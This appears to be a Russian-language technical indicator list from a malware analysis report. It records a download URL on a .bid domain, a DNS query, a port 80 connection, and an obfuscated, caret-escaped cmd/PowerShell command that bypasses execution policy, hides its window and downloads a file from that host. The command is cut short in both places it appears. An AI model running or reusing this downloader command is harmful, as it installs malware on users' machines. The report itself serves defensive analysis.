Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWer^s^HElL^.^eXE^ -ex^E^CutiONPo^l^iCy ^bYP^AsS -nopRo^fIle -wiN^D^O^WSty^L^e^ HiddEN (n^eW^-^Ob^Je^CT sYsTeM.NEt.w^eb^cLienT).^dO^wNl^O^aD^FiLE('http://asecwitlecn.bid/read....
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "poWer^s^HElL^.^eXE^ -ex^E^CutiONPo^l^iCy ^bYP^AsS -nopRo^fIle -wiN^D^O^WSty^L^e^ HiddEN (n^eW^-^Ob^Je^CT sYsTeM.NEt.w^eb^cLienT).^dO^wNl^O^aD^FiLE('http://asecwitlecn.bid/read....' (со скрытым окном)